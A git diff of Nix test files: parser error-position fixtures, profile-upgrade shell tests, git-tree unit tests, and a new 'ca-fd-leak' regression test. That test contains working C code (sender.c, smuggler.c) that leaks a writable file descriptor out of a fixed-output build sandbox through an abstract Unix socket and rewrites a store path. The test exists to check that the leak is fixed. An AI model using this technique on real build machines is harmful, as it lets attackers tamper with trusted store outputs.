index 000000000..ff13e2d55
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-2.err.exp
@@ -0,0 +1,6 @@
+error: undefined variable 'invalid'
+ at /pwd/lang/eval-fail-eol-2.nix:2:1:
+ 1| # foo
+ 2| invalid
+ | ^
+ 3| # bar
diff --git a/tests/functional/lang/eval-fail-eol-2.nix b/tests/functional/lang/eval-fail-eol-2.nix
new file mode 100644
index 000000000..0cf92a425
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-2.nix
@@ -0,0 +1,2 @@
+# foo
invalid
+# bar
diff --git a/tests/functional/lang/eval-fail-eol-3.err.exp b/tests/functional/lang/eval-fail-eol-3.err.exp
new file mode 100644
index 000000000..ada3c5ecd
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-3.err.exp
@@ -0,0 +1,6 @@
+error: undefined variable 'invalid'
+ at /pwd/lang/eval-fail-eol-3.nix:2:1:
+ 1| # foo
+ 2| invalid
+ | ^
+ 3| # bar
diff --git a/tests/functional/lang/eval-fail-eol-3.nix b/tests/functional/lang/eval-fail-eol-3.nix
new file mode 100644
index 000000000..33422452d
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-3.nix
@@ -0,0 +1,3 @@
+# foo
+invalid
+# bar
diff --git a/tests/functional/lang/eval-okay-inherit-attr-pos.exp b/tests/functional/lang/eval-okay-inherit-attr-pos.exp
new file mode 100644
index 000000000..e87d037c6
--- /dev/null
+++ b/tests/functional/lang/eval-okay-inherit-attr-pos.exp
@@ -0,0 +1 @@
+[ { column = 17; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 4; } { column = 19; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 4; } { column = 21; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 5; } { column = 23; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 5; } ]
diff --git a/tests/functional/lang/eval-okay-inherit-attr-pos.nix b/tests/functional/lang/eval-okay-inherit-attr-pos.nix
new file mode 100644
index 000000000..017ab1d36
--- /dev/null
+++ b/tests/functional/lang/eval-okay-inherit-attr-pos.nix
@@ -0,0 +1,12 @@
+let
+ d = 0;
+ x = 1;
+ y = { inherit d x; };
+ z = { inherit (y) d x; };
+in
+ [
+ (builtins.unsafeGetAttrPos "d" y)
+ (builtins.unsafeGetAttrPos "x" y)
+ (builtins.unsafeGetAttrPos "d" z)
+ (builtins.unsafeGetAttrPos "x" z)
+ ]
diff --git a/tests/functional/lang/parse-fail-dup-attrs-1.err.exp b/tests/functional/lang/parse-fail-dup-attrs-1.err.exp
index 6c3a3510c..ffb5198c1 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-1.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-1.err.exp
@@ -3,3 +3,4 @@ error: attribute 'x' already defined at «stdin»:1:3
2| y = 456;
3| x = 789;
| ^
+ 4| }
diff --git a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
index fecdece20..3105e60de 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
@@ -1,5 +1,6 @@
error: attribute 'x' already defined at «stdin»:9:5
- at «stdin»:10:17:
+ at «stdin»:10:18:
9| x = 789;
10| inherit (as) x;
- | ^
+ | ^
+ 11| };
diff --git a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
index fecdece20..3105e60de 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
@@ -1,5 +1,6 @@
error: attribute 'x' already defined at «stdin»:9:5
- at «stdin»:10:17:
+ at «stdin»:10:18:
9| x = 789;
10| inherit (as) x;
- | ^
+ | ^
+ 11| };
diff --git a/tests/functional/lang/parse-fail-dup-attrs-4.err.exp b/tests/functional/lang/parse-fail-dup-attrs-4.err.exp
index f85ffea51..c98a8f8d0 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-4.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-4.err.exp
@@ -3,3 +3,4 @@ error: attribute 'services.ssh.port' already defined at «stdin»:2:3
2| services.ssh.port = 22;
3| services.ssh.port = 23;
| ^
+ 4| }
diff --git a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
index 98cea9dae..4e0a48eff 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
@@ -1,5 +1,6 @@
-error: attribute 'x' already defined at «stdin»:6:12
- at «stdin»:7:12:
+error: attribute 'x' already defined at «stdin»:6:13
+ at «stdin»:7:13:
6| inherit x;
7| inherit x;
- | ^
+ | ^
+ 8| };
diff --git a/tests/functional/lang/parse-fail-eof-in-string.err.exp b/tests/functional/lang/parse-fail-eof-in-string.err.exp
index b28d35950..17f34b62d 100644
--- a/tests/functional/lang/parse-fail-eof-in-string.err.exp
+++ b/tests/functional/lang/parse-fail-eof-in-string.err.exp
@@ -1,5 +1,5 @@
error: syntax error, unexpected end of file, expecting '"'
- at «stdin»:3:5:
+ at «stdin»:3:6:
2| # Note that this file must not end with a newline.
3| a 1"$
- | ^
+ | ^
diff --git a/tests/functional/lang/parse-fail-eof-pos.err.exp b/tests/functional/lang/parse-fail-eof-pos.err.exp
new file mode 100644
index 000000000..ef9ca381c
--- /dev/null
+++ b/tests/functional/lang/parse-fail-eof-pos.err.exp
@@ -0,0 +1,5 @@
+error: syntax error, unexpected end of file
+ at «stdin»:3:1:
+ 2| # no content
+ 3|
+ | ^
diff --git a/tests/functional/lang/parse-fail-eof-pos.nix b/tests/functional/lang/parse-fail-eof-pos.nix
new file mode 100644
index 000000000..bd66a2c98
--- /dev/null
+++ b/tests/functional/lang/parse-fail-eof-pos.nix
@@ -0,0 +1,2 @@
+(
+# no content
diff --git a/tests/functional/lang/parse-fail-regression-20060610.err.exp b/tests/functional/lang/parse-fail-regression-20060610.err.exp
index d8875a6a5..6ae7c01bf 100644
--- a/tests/functional/lang/parse-fail-regression-20060610.err.exp
+++ b/tests/functional/lang/parse-fail-regression-20060610.err.exp
@@ -1,6 +1,6 @@
error: undefined variable 'gcc'
- at «stdin»:8:12:
- 7|
+ at «stdin»:9:13:
8| body = ({
- | ^
9| inherit gcc;
+ | ^
+ 10| }).gcc;
diff --git a/tests/functional/lang/parse-fail-undef-var-2.err.exp b/tests/functional/lang/parse-fail-undef-var-2.err.exp
index a58d8dca4..393c454dd 100644
--- a/tests/functional/lang/parse-fail-undef-var-2.err.exp
+++ b/tests/functional/lang/parse-fail-undef-var-2.err.exp
@@ -1,5 +1,6 @@
error: syntax error, unexpected ':', expecting '}'
at «stdin»:3:13:
2|
- 3| f = {x, y :
+ 3| f = {x, y : ["baz" "bar" z "bat"]}: x + y;
| ^
+ 4|
diff --git a/tests/functional/lang/parse-fail-utf8.err.exp b/tests/functional/lang/parse-fail-utf8.err.exp
index e83abdb9e..1c83f6eb3 100644
--- a/tests/functional/lang/parse-fail-utf8.err.exp
+++ b/tests/functional/lang/parse-fail-utf8.err.exp
@@ -1,4 +1,5 @@
error: syntax error, unexpected invalid token, expecting end of file
at «stdin»:1:5:
- 1| 123
+ 1| 123 é 4
| ^
+ 2|
diff --git a/tests/functional/lang/parse-okay-subversion.exp b/tests/functional/lang/parse-okay-subversion.exp
index 2303932c4..32fbba3c5 100644
--- a/tests/functional/lang/parse-okay-subversion.exp
+++ b/tests/functional/lang/parse-okay-subversion.exp
@@ -1 +1 @@
-({ fetchurl, localServer ? false, httpServer ? false, sslSupport ? false, pythonBindings ? false, javaSwigBindings ? false, javahlBindings ? false, stdenv, openssl ? null, httpd ? null, db4 ? null, expat, swig ? null, j2sdk ? null }: assert (expat != null); assert (localServer -> (db4 != null)); assert (httpServer -> ((httpd != null) && ((httpd).expat == expat))); assert (sslSupport -> ((openssl != null) && (httpServer -> ((httpd).openssl == openssl)))); assert (pythonBindings -> ((swig != null) && (swig).pythonSupport)); assert (javaSwigBindings -> ((swig != null) && (swig).javaSupport)); assert (javahlBindings -> (j2sdk != null)); ((stdenv).mkDerivation { inherit expat httpServer javaSwigBindings javahlBindings localServer pythonBindings sslSupport; builder = /foo/bar; db4 = (if localServer then db4 else null); httpd = (if httpServer then httpd else null); j2sdk = (if javaSwigBindings then (swig).j2sdk else (if javahlBindings then j2sdk else null)); name = "subversion-1.1.1"; openssl = (if sslSupport then openssl else null); patches = (if javahlBindings then [ (/javahl.patch) ] else [ ]); python = (if pythonBindings then (swig).python else null); src = (fetchurl { md5 = "a180c3fe91680389c210c99def54d9e0"; url = "http://subversion.tigris.org/tarballs/subversion-1.1.1.tar.bz2"; }); swig = (if (pythonBindings || javaSwigBindings) then swig else null); }))
+({ db4 ? null, expat, fetchurl, httpServer ? false, httpd ? null, j2sdk ? null, javaSwigBindings ? false, javahlBindings ? false, localServer ? false, openssl ? null, pythonBindings ? false, sslSupport ? false, stdenv, swig ? null }: assert (expat != null); assert (localServer -> (db4 != null)); assert (httpServer -> ((httpd != null) && ((httpd).expat == expat))); assert (sslSupport -> ((openssl != null) && (httpServer -> ((httpd).openssl == openssl)))); assert (pythonBindings -> ((swig != null) && (swig).pythonSupport)); assert (javaSwigBindings -> ((swig != null) && (swig).javaSupport)); assert (javahlBindings -> (j2sdk != null)); ((stdenv).mkDerivation { inherit expat httpServer javaSwigBindings javahlBindings localServer pythonBindings sslSupport; builder = /foo/bar; db4 = (if localServer then db4 else null); httpd = (if httpServer then httpd else null); j2sdk = (if javaSwigBindings then (swig).j2sdk else (if javahlBindings then j2sdk else null)); name = "subversion-1.1.1"; openssl = (if sslSupport then openssl else null); patches = (if javahlBindings then [ (/javahl.patch) ] else [ ]); python = (if pythonBindings then (swig).python else null); src = (fetchurl { md5 = "a180c3fe91680389c210c99def54d9e0"; url = "http://subversion.tigris.org/tarballs/subversion-1.1.1.tar.bz2"; }); swig = (if (pythonBindings || javaSwigBindings) then swig else null); }))
diff --git a/tests/functional/local.mk b/tests/functional/local.mk
index 18eb887cd..8bb8e3600 100644
--- a/tests/functional/local.mk
+++ b/tests/functional/local.mk
@@ -129,7 +129,8 @@ nix_tests = \
read-only-store.sh \
nested-sandboxing.sh \
impure-env.sh \
- debugger.sh
+ debugger.sh \
+ help.sh
ifeq ($(HAVE_LIBCPUID), 1)
nix_tests += compute-levels.sh
diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index ee93251e9..7c4da6283 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -74,10 +74,49 @@ nix profile upgrade flake1
[[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello NixOS" ]]
nix profile history | grep "packages.$system.default: 1.0, 1.0-man -> 2.0, 2.0-man"
+# Test upgrading package using regular expression.
+printf 2.1 > $flake1Dir/version
+nix profile upgrade --regex '.*'
+[[ $(readlink $TEST_HOME/.nix-profile/bin/hello) =~ .*-profile-test-2\.1/bin/hello ]]
+nix profile rollback
+
+# Test upgrading all packages
+printf 2.2 > $flake1Dir/version
+nix profile upgrade --all
+[[ $(readlink $TEST_HOME/.nix-profile/bin/hello) =~ .*-profile-test-2\.2/bin/hello ]]
+nix profile rollback
+printf 1.0 > $flake1Dir/version
+
+# Test --all exclusivity.
+assertStderr nix --offline profile upgrade --all foo << EOF
+error: --all cannot be used with package names or regular expressions.
+Try 'nix --help' for more information.
+EOF
+
+# Test matching no packages using literal package name.
+assertStderr nix --offline profile upgrade this_package_is_not_installed << EOF
+warning: Package name 'this_package_is_not_installed' does not match any packages in the profile.
+warning: No packages to upgrade. Use 'nix profile list' to see the current profile.
+EOF
+
+# Test matching no packages using regular expression.
+assertStderr nix --offline profile upgrade --regex '.*unknown_package.*' << EOF
+warning: Regex '.*unknown_package.*' does not match any packages in the profile.
+warning: No packages to upgrade. Use 'nix profile list' to see the current profile.
+EOF
+
+# Test removing all packages using regular expression.
+nix profile remove --regex '.*' 2>&1 | grep "removed 2 packages, kept 0 packages"
+nix profile rollback
+
# Test 'history', 'diff-closures'.
nix profile diff-closures
# Test rollback.
+printf World > $flake1Dir/who
+nix profile upgrade flake1
+printf NixOS > $flake1Dir/who
+nix profile upgrade flake1
nix profile rollback
[[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello World" ]]
diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
new file mode 100644
index 000000000..a6ae72adc
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/default.nix
@@ -0,0 +1,90 @@
+# Nix is a sandboxed build system. But Not everything can be handled inside its
+# sandbox: Network access is normally blocked off, but to download sources, a
+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations".
+# The detail here is not important, but in our case it means that the hash of
+# the output has to be known beforehand. And if you know that, you get a few
+# rights: you no longer run inside a special network namespace!
+#
+# Now, Linux has a special feature, that not many other unices do: Abstract
+# unix domain sockets! Not only that, but those are namespaced using the
+# network namespace! That means that we have a way to create sockets that are
+# available in every single fixed-output derivation, and also all processes
+# running on the host machine! Now, this wouldn't be that much of an issue, as,
+# well, the whole idea is that the output is pure, and all processes in the
+# sandbox are killed before finalizing the output. What if we didn't need those
+# processes at all? Unix domain sockets have a semi-known trick: you can pass
+# file descriptors around!
+# This makes it possible to exfiltrate a file-descriptor with write access to
+# $out outside of the sandbox. And that file-descriptor can be used to modify
+# the contents of the store path after it has been registered.
+
+{ config, ... }:
+
+let
+ pkgs = config.nodes.machine.nixpkgs.pkgs;
+
+ # Simple C program that sends a a file descriptor to `$out` to a Unix
+ # domain socket.
+ # Compiled statically so that we can easily send it to the VM and use it
+ # inside the build sandbox.
+ sender = pkgs.runCommandWith {
+ name = "sender";
+ stdenv = pkgs.pkgsStatic.stdenv;
+ } ''
+ $CC -static -o $out ${./sender.c}
+ '';
+
+ # Okay, so we have a file descriptor shipped out of the FOD now. But the
+ # Nix store is read-only, right? .. Well, yeah. But this file descriptor
+ # lives in a mount namespace where it is not! So even when this file exists
+ # in the actual Nix store, we're capable of just modifying its contents...
+ smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c);
+
+ # The abstract socket path used to exfiltrate the file descriptor
+ socketName = "FODSandboxExfiltrationSocket";
+in
+{
+ name = "ca-fd-leak";
+
+ nodes.machine =
+ { config, lib, pkgs, ... }:
+ { virtualisation.writableStore = true;
+ nix.settings.substituters = lib.mkForce [ ];
+ virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ];
+ };
+
+ testScript = { nodes }: ''
+ start_all()
+
+ machine.succeed("echo hello")
+ # Start the smuggler server
+ machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &")
+
+ # Build the smuggled derivation.
+ # This will connect to the smuggler server and send it the file descriptor
+ machine.succeed(r"""
+ nix-build -E '
+ builtins.derivation {
+ name = "smuggled";
+ system = builtins.currentSystem;
+ # look ma, no tricks!
+ outputHashMode = "flat";
+ outputHashAlgo = "sha256";
+ outputHash = builtins.hashString "sha256" "hello, world\n";
+ builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
+ args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ];
+ }'
+ """.strip())
+
+
+ # Tell the smuggler server that we're done
+ machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
+
+ # Check that the file was not modified
+ machine.succeed(r"""
+ cat ./result
+ test "$(cat ./result)" = "hello, world"
+ """.strip())
+ '';
+
+}
diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c
new file mode 100644
index 000000000..75e54fc8f
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/sender.c
@@ -0,0 +1,65 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main(int argc, char **argv) {
+
+ assert(argc == 2);
+
+ int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+ // Set up a abstract domain socket path to connect to.
+ struct sockaddr_un data;
+ data.sun_family = AF_UNIX;
+ data.sun_path[0] = 0;
+ strcpy(data.sun_path + 1, argv[1]);
+
+ // Now try to connect, To ensure we work no matter what order we are
+ // executed in, just busyloop here.
+ int res = -1;
+ while (res < 0) {
+ res = connect(sock, (const struct sockaddr *)&data,
+ offsetof(struct sockaddr_un, sun_path)
+ + strlen(argv[1])
+ + 1);
+ if (res < 0 && errno != ECONNREFUSED) perror("connect");
+ if (errno != ECONNREFUSED) break;
+ }
+
+ // Write our message header.
+ struct msghdr msg = {0};
+ msg.msg_control = malloc(128);
+ msg.msg_controllen = 128;
+
+ // Write an SCM_RIGHTS message containing the output path.
+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+ hdr->cmsg_len = CMSG_LEN(sizeof(int));
+ hdr->cmsg_level = SOL_SOCKET;
+ hdr->cmsg_type = SCM_RIGHTS;
+ int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
+ memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
+
+ msg.msg_controllen = CMSG_SPACE(sizeof(int));
+
+ // Write a single null byte too.
+ msg.msg_iov = malloc(sizeof(struct iovec));
+ msg.msg_iov[0].iov_base = "";
+ msg.msg_iov[0].iov_len = 1;
+ msg.msg_iovlen = 1;
+
+ // Send it to the othher side of this connection.
+ res = sendmsg(sock, &msg, 0);
+ if (res < 0) perror("sendmsg");
+ int buf;
+
+ // Wait for the server to close the socket, implying that it has
+ // received the commmand.
+ recv(sock, (void *)&buf, sizeof(int), 0);
+}
diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c
new file mode 100644
index 000000000..82acf37e6
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/smuggler.c
@@ -0,0 +1,66 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main(int argc, char **argv) {
+
+ assert(argc == 2);
+
+ int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+ // Bind to the socket.
+ struct sockaddr_un data;
+ data.sun_family = AF_UNIX;
+ data.sun_path[0] = 0;
+ strcpy(data.sun_path + 1, argv[1]);
+ int res = bind(sock, (const struct sockaddr *)&data,
+ offsetof(struct sockaddr_un, sun_path)
+ + strlen(argv[1])
+ + 1);
+ if (res < 0) perror("bind");
+
+ res = listen(sock, 1);
+ if (res < 0) perror("listen");
+
+ int smuggling_fd = -1;
+
+ // Accept the connection a first time to receive the file descriptor.
+ fprintf(stderr, "%s\n", "Waiting for the first connection");
+ int a = accept(sock, 0, 0);
+ if (a < 0) perror("accept");
+
+ struct msghdr msg = {0};
+ msg.msg_control = malloc(128);
+ msg.msg_controllen = 128;
+
+ // Receive the file descriptor as sent by the smuggler.
+ recvmsg(a, &msg, 0);
+
+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+ while (hdr) {
+ if (hdr->cmsg_level == SOL_SOCKET
+ && hdr->cmsg_type == SCM_RIGHTS) {
+
+ // Grab the copy of the file descriptor.
+ memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
+ }
+
+ hdr = CMSG_NXTHDR(&msg, hdr);
+ }
+ fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection");
+ close(a);
+
+ // Wait for a second connection, which will tell us that the build is
+ // done
+ a = accept(sock, 0, 0);
+ fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
+ // Write a new content to the file
+ if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
+ char * new_content = "Pwned\n";
+ int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
+ if (written_bytes != strlen(new_content)) perror("write");
+}
diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix
index 8f4fa2621..98de31e13 100644
--- a/tests/nixos/default.nix
+++ b/tests/nixos/default.nix
@@ -109,7 +109,7 @@ in
nix.package = lib.mkForce pkgs.nixVersions.nix_2_13;
};
};
-
+
# TODO: (nixpkgs update) remoteBuildsSshNg_remote_2_18 = ...
# Test our Nix as a builder for clients that are older
@@ -156,4 +156,6 @@ in
(system: runNixOSTestFor system ./setuid.nix);
fetch-git = runNixOSTestFor "x86_64-linux" ./fetch-git;
+
+ ca-fd-leak = runNixOSTestFor "x86_64-linux" ./ca-fd-leak;
}
diff --git a/tests/nixos/github-flakes.nix b/tests/nixos/github-flakes.nix
index a51689445..6f8a5b9d8 100644
--- a/tests/nixos/github-flakes.nix
+++ b/tests/nixos/github-flakes.nix
@@ -58,7 +58,7 @@ let
mkdir -p $out/{commits,tarball}
# Setup https://docs.github.com/en/rest/commits/commits#get-a-commit
- echo '{"sha": "${private-flake-rev}"}' > $out/commits/HEAD
+ echo '{"sha": "${private-flake-rev}", "commit": {"tree": {"sha": "ffffffffffffffffffffffffffffffffffffffff"}}}' > $out/commits/HEAD
# Setup tarball download via API
dir=private-flake
@@ -72,7 +72,7 @@ let
mkdir -p $out/commits
# Setup https://docs.github.com/en/rest/commits/commits#get-a-commit
- echo '{"sha": "${nixpkgs.rev}"}' > $out/commits/HEAD
+ echo '{"sha": "${nixpkgs.rev}", "commit": {"tree": {"sha": "ffffffffffffffffffffffffffffffffffffffff"}}}' > $out/commits/HEAD
'';
archive = pkgs.runCommand "nixpkgs-flake" {}
diff --git a/tests/unit/libexpr/primops.cc b/tests/unit/libexpr/primops.cc
index 6d7649b3c..b1426edae 100644
--- a/tests/unit/libexpr/primops.cc
+++ b/tests/unit/libexpr/primops.cc
@@ -151,7 +151,7 @@ namespace nix {
}
TEST_F(PrimOpTest, unsafeGetAttrPos) {
- state.corepkgsFS->addFile(CanonPath("foo.nix"), "{ y = \"x\"; }");
+ state.corepkgsFS->addFile(CanonPath("foo.nix"), "\n\r\n\r{ y = \"x\"; }");
auto expr = "builtins.unsafeGetAttrPos \"y\" (import )";
auto v = eval(expr);
@@ -165,10 +165,12 @@ namespace nix {
auto line = v.attrs->find(createSymbol("line"));
ASSERT_NE(line, nullptr);
- ASSERT_THAT(*line->value, IsIntEq(1));
+ state.forceValue(*line->value, noPos);
+ ASSERT_THAT(*line->value, IsIntEq(4));
auto column = v.attrs->find(createSymbol("column"));
ASSERT_NE(column, nullptr);
+ state.forceValue(*column->value, noPos);
ASSERT_THAT(*column->value, IsIntEq(3));
}
diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc
index aabf156c2..d2d699a64 100644
--- a/tests/unit/libexpr/value/print.cc
+++ b/tests/unit/libexpr/value/print.cc
@@ -110,8 +110,8 @@ TEST_F(ValuePrintingTests, vLambda)
.up = nullptr,
.values = { }
};
- PosTable::Origin origin((std::monostate()));
- auto posIdx = state.positions.add(origin, 1, 1);
+ PosTable::Origin origin = state.positions.addOrigin(std::monostate(), 1);
+ auto posIdx = state.positions.add(origin, 0);
auto body = ExprInt(0);
auto formals = Formals {};
@@ -558,8 +558,8 @@ TEST_F(ValuePrintingTests, ansiColorsLambda)
.up = nullptr,
.values = { }
};
- PosTable::Origin origin((std::monostate()));
- auto posIdx = state.positions.add(origin, 1, 1);
+ PosTable::Origin origin = state.positions.addOrigin(std::monostate(), 1);
+ auto posIdx = state.positions.add(origin, 0);
auto body = ExprInt(0);
auto formals = Formals {};
diff --git a/tests/unit/libstore/outputs-spec.cc b/tests/unit/libstore/outputs-spec.cc
index 456196be1..63cde681b 100644
--- a/tests/unit/libstore/outputs-spec.cc
+++ b/tests/unit/libstore/outputs-spec.cc
@@ -6,11 +6,9 @@
namespace nix {
-#ifndef NDEBUG
TEST(OutputsSpec, no_empty_names) {
ASSERT_DEATH(OutputsSpec::Names { std::set { } }, "");
}
-#endif
#define TEST_DONT_PARSE(NAME, STR) \
TEST(OutputsSpec, bad_ ## NAME) { \
diff --git a/tests/unit/libutil/data/git/tree.bin b/tests/unit/libutil/data/git/tree.bin
index 5256ec140..4ccd43e9a 100644
Binary files a/tests/unit/libutil/data/git/tree.bin and b/tests/unit/libutil/data/git/tree.bin differ
diff --git a/tests/unit/libutil/data/git/tree.txt b/tests/unit/libutil/data/git/tree.txt
index be3d02920..cd40b6a55 100644
--- a/tests/unit/libutil/data/git/tree.txt
+++ b/tests/unit/libutil/data/git/tree.txt
@@ -1,3 +1,4 @@
100644 blob 63ddb340119baf8492d2da53af47e8c7cfcd5eb2 Foo
100755 blob 63ddb340119baf8492d2da53af47e8c7cfcd5eb2 bAr
040000 tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904 baZ
+120000 blob 63ddb340119baf8492d2da53af47e8c7cfcd5eb2 quuX
diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc
index 76ef86bcf..4f92488d6 100644
--- a/tests/unit/libutil/git.cc
+++ b/tests/unit/libutil/git.cc
@@ -67,7 +67,7 @@ TEST_F(GitTest, blob_read) {
StringSink out;
RegularFileSink out2 { out };
ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Blob);
- parseBlob(out2, "", in, false, mockXpSettings);
+ parseBlob(out2, "", in, BlobMode::Regular, mockXpSettings);
auto expected = readFile(goldenMaster("hello-world.bin"));
@@ -115,6 +115,15 @@ const static Tree tree = {
.hash = Hash::parseAny("4b825dc642cb6eb9a060e54bf8d69288fbee4904", HashAlgorithm::SHA1),
},
},
+ {
+ "quuX",
+ {
+ .mode = Mode::Symlink,
+ // hello world with special chars from above (symlink target
+ // can be anything)
+ .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1),
+ },
+ },
};
TEST_F(GitTest, tree_read) {
@@ -165,6 +174,12 @@ TEST_F(GitTest, both_roundrip) {
.contents = "good day,\n\0\n\tworld!",
},
},
+ {
+ "quux",
+ File::Symlink {
+ .target = "/over/there",
+ },
+ },
},
},
},
@@ -195,21 +210,24 @@ TEST_F(GitTest, both_roundrip) {
MemorySink sinkFiles2 { files2 };
- std::function mkSinkHook;
- mkSinkHook = [&](auto prefix, auto & hash, auto executable) {
+ std::function] |